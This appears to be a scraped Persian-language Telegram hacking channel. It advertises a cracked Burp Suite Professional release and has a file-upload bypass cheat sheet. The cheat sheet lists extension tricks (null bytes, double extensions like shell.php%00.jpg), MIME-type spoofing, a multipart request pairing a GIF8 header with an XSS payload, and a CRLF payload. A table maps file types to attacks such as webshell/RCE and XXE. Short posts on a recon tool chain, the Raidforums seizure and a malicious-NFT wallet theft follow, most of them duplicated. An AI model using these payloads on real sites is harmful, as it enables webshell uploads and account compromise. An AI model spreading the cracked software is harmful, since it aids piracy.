burpsuite_pro_v2022.1.zip
503 MB
Burp Suite Professional v2022.1
😈 + Crack
Released 24 January 2022
😈 + Crack
Released 24 January 2022
نکاتی برای دور زدن محدودیدت آپلود فایل:
🔹 تغییر پسوند فایل ها
۱- افزودن کارکترهای خاص به انتهای پسوند فایل
مثال:
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php….
file.pHp5….
۲- استفاده از پسوند های دوگانه
مثال:
file.png.php
file.png.pHp5
۳- استفاده از نال بایت و داده جانک
مثال:
shell.php%00.jpg
shell.php%0delete0.jpg
file.phpJunk123png
۴- استفاده از حروف کوچک و بزرگ
مثال:
file.jPg
file.SvG
file.asP
۵- استفاده از HTTP Parameter Pollution در نام فایل
مثال:
filename=1.jpg&filename=.php
🔹 دور زدن اعتبارسنجی مقدار content-type با تغییر MIME type
مثال:
تبدیل
Content-type: application/x-php
به
Content-type: image/jpeg
🔹 دور زدن اعتبار سنجی هدر فایل
۱- فیلتر های بررسی کننده هدرfile signatures معمولا صحت ۴ بایت اول آن را مورد بررسی قرار می دهند که می توان بعد از آن کد مخرب را قرار داد
مثال:
-----------------------------6683303835495
Content-Disposition: form-data; name="upload"; filename="badfile.''gif"
Content-Type: image/png
GIF8
<html><noscript>alert('XSS is easy');</noscript></html>
-----------------------------6683303835495--
لیست هدرfile signatures:
https://en.wikipedia.org/wiki/List_of_file_signatures
۲- استفاده از CRLF در محتوای فایل
مثال:
x.png%22%0d%0a%0d%0a%0d%0a<noscript>alert(1)</noscript>
🔹در پایان لیستی آورده شده است که با کمک آن می توان فهمید پسوند های مختلف فایل به چه حملاتی می تواند منجر شود:
SVG: Stored XSS / SSRF / XXE
HTML / JS : HTML injection / XSS / Open redirect
ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
GIF: Stored XSS / SSRF
CSV: CSV injection
PNG / JPEG: Pixel flood attack (DoS)
ZIP: RCE via LFI / DoS
PDF / PPTX: SSRF / BLIND XXE
XML: XXE
AVI: LFI / SSRF
اطلاعات بیشتر در:
https://infosecwriteups.com/all-about-unrestricted-file-upload-a4ecf243b86b
https://anotherhackerblog.com/exploiting-file-uploads-pt1/
https://book.hacktricks.xyz/pentesting-web/file-upload
🔹 تغییر پسوند فایل ها
۱- افزودن کارکترهای خاص به انتهای پسوند فایل
مثال:
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php….
file.pHp5….
۲- استفاده از پسوند های دوگانه
مثال:
file.png.php
file.png.pHp5
۳- استفاده از نال بایت و داده جانک
مثال:
shell.php%00.jpg
shell.php%0delete0.jpg
file.phpJunk123png
۴- استفاده از حروف کوچک و بزرگ
مثال:
file.jPg
file.SvG
file.asP
۵- استفاده از HTTP Parameter Pollution در نام فایل
مثال:
filename=1.jpg&filename=.php
🔹 دور زدن اعتبارسنجی مقدار content-type با تغییر MIME type
مثال:
تبدیل
Content-type: application/x-php
به
Content-type: image/jpeg
🔹 دور زدن اعتبار سنجی هدر فایل
۱- فیلتر های بررسی کننده هدرfile signatures معمولا صحت ۴ بایت اول آن را مورد بررسی قرار می دهند که می توان بعد از آن کد مخرب را قرار داد
مثال:
-----------------------------6683303835495
Content-Disposition: form-data; name="upload"; filename="badfile.''gif"
Content-Type: image/png
GIF8
<html><noscript>alert('XSS is easy');</noscript></html>
-----------------------------6683303835495--
لیست هدرfile signatures:
https://en.wikipedia.org/wiki/List_of_file_signatures
۲- استفاده از CRLF در محتوای فایل
مثال:
x.png%22%0d%0a%0d%0a%0d%0a<noscript>alert(1)</noscript>
🔹در پایان لیستی آورده شده است که با کمک آن می توان فهمید پسوند های مختلف فایل به چه حملاتی می تواند منجر شود:
SVG: Stored XSS / SSRF / XXE
HTML / JS : HTML injection / XSS / Open redirect
ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
GIF: Stored XSS / SSRF
CSV: CSV injection
PNG / JPEG: Pixel flood attack (DoS)
ZIP: RCE via LFI / DoS
PDF / PPTX: SSRF / BLIND XXE
XML: XXE
AVI: LFI / SSRF
اطلاعات بیشتر در:
https://infosecwriteups.com/all-about-unrestricted-file-upload-a4ecf243b86b
https://anotherhackerblog.com/exploiting-file-uploads-pt1/
https://book.hacktricks.xyz/pentesting-web/file-upload
nmap -sV -A -> nikto -h -> amass -> subli3ter ->girtrob
CyberSecurity
https://wordlists.assetnote.io/
fuzz wordlist
✔️ انجمن هکینگ Raidforums توسط پلیس مصادره شد.
مدیران انجمن هک Raidforum میگویند دامنه رسمی این سایت (Raidforums.com) توسط پلیس مصادره شده و مدیر اصلی سایت ( با نام کاربری Omnipotent ) مدت زیادی است که مفقود شده و احتمالا دستگیر شده است!
این سایت از انجمنساز MyBB استفاده میکند و چند هفته پیش به علت ضعف امنیتی و عدم بهروزرسانی دیتابیس این انجمن هک شد و هکرها بعد از دانلود اطلاعات جداول دیتابیس را Drop کردند که هکرهای دیگر نتوانند به دیتابیس انجمن دسترسی پیدا کنند.
- نکته قابل توجه این است که اکثر دیتاهایی که بصورت عمومی از سرویس های ایرانیان فروخته میشد در این فروم قرار میگرفت!
انجمن Raidforums یکی از بزرگترین سایتهای هک تحت وب بود که بیشتر برای درز اطلاعات و خرید و فروش دیتابیس مورد توجه قرار داشت.
مدیران انجمن هک Raidforum میگویند دامنه رسمی این سایت (Raidforums.com) توسط پلیس مصادره شده و مدیر اصلی سایت ( با نام کاربری Omnipotent ) مدت زیادی است که مفقود شده و احتمالا دستگیر شده است!
این سایت از انجمنساز MyBB استفاده میکند و چند هفته پیش به علت ضعف امنیتی و عدم بهروزرسانی دیتابیس این انجمن هک شد و هکرها بعد از دانلود اطلاعات جداول دیتابیس را Drop کردند که هکرهای دیگر نتوانند به دیتابیس انجمن دسترسی پیدا کنند.
- نکته قابل توجه این است که اکثر دیتاهایی که بصورت عمومی از سرویس های ایرانیان فروخته میشد در این فروم قرار میگرفت!
انجمن Raidforums یکی از بزرگترین سایتهای هک تحت وب بود که بیشتر برای درز اطلاعات و خرید و فروش دیتابیس مورد توجه قرار داشت.
⭕️ از دست رفتن تمام دارایی، تنها با کلیک بر یک NFT مخرب
@matitanium
💰پلتفرم Rarible با بیش از ۲.۱ میلیون کاربر و حجم معاملات بیش از ۲۷۳ میلیون دلار در سال، یکی از بزرگترین بازارهای NFT جهان بهشمار میرود.
💸 بهتازگی یک نقص امنیتی در این پلفترم شناسایی شده، که بواسطهی آن تمام دارایی کاربر تنها با کلیک کردن بر یک NFT مخرب، سرقت خواهد شد.
👾 روش هک
۱. هکر ابتدا یک NFT مانند عکس یا گیف طراحی میکند، و کد مخربی را در آن قرار میدهد.
۲. در صورت کلیک کاربر بر آن، کد جاوااسکریپت مخرب اجرا، NFTهای کاربر با استفاده از API اتریوم بررسی، و درخواست تراکنش setApprovalForAll به والت کاربر ارسال میشود.
🔗 تابع setApprovalForAll و حساسیت آن
۳. حال در صورت موافقت کاربر و تایید تراکنش، مهاجم به NFTهای قربانی دسترسی کامل پیدا کرده و میتواند آنها را به حساب خود منتقل کند.
🌐 یک نمونه NFT مخرب و مراحل هک توسط آن + توصیههای امنیتی
@matitanium
@matitanium
💰پلتفرم Rarible با بیش از ۲.۱ میلیون کاربر و حجم معاملات بیش از ۲۷۳ میلیون دلار در سال، یکی از بزرگترین بازارهای NFT جهان بهشمار میرود.
💸 بهتازگی یک نقص امنیتی در این پلفترم شناسایی شده، که بواسطهی آن تمام دارایی کاربر تنها با کلیک کردن بر یک NFT مخرب، سرقت خواهد شد.
👾 روش هک
۱. هکر ابتدا یک NFT مانند عکس یا گیف طراحی میکند، و کد مخربی را در آن قرار میدهد.
۲. در صورت کلیک کاربر بر آن، کد جاوااسکریپت مخرب اجرا، NFTهای کاربر با استفاده از API اتریوم بررسی، و درخواست تراکنش setApprovalForAll به والت کاربر ارسال میشود.
🔗 تابع setApprovalForAll و حساسیت آن
۳. حال در صورت موافقت کاربر و تایید تراکنش، مهاجم به NFTهای قربانی دسترسی کامل پیدا کرده و میتواند آنها را به حساب خود منتقل کند.
🌐 یک نمونه NFT مخرب و مراحل هک توسط آن + توصیههای امنیتی
@matitanium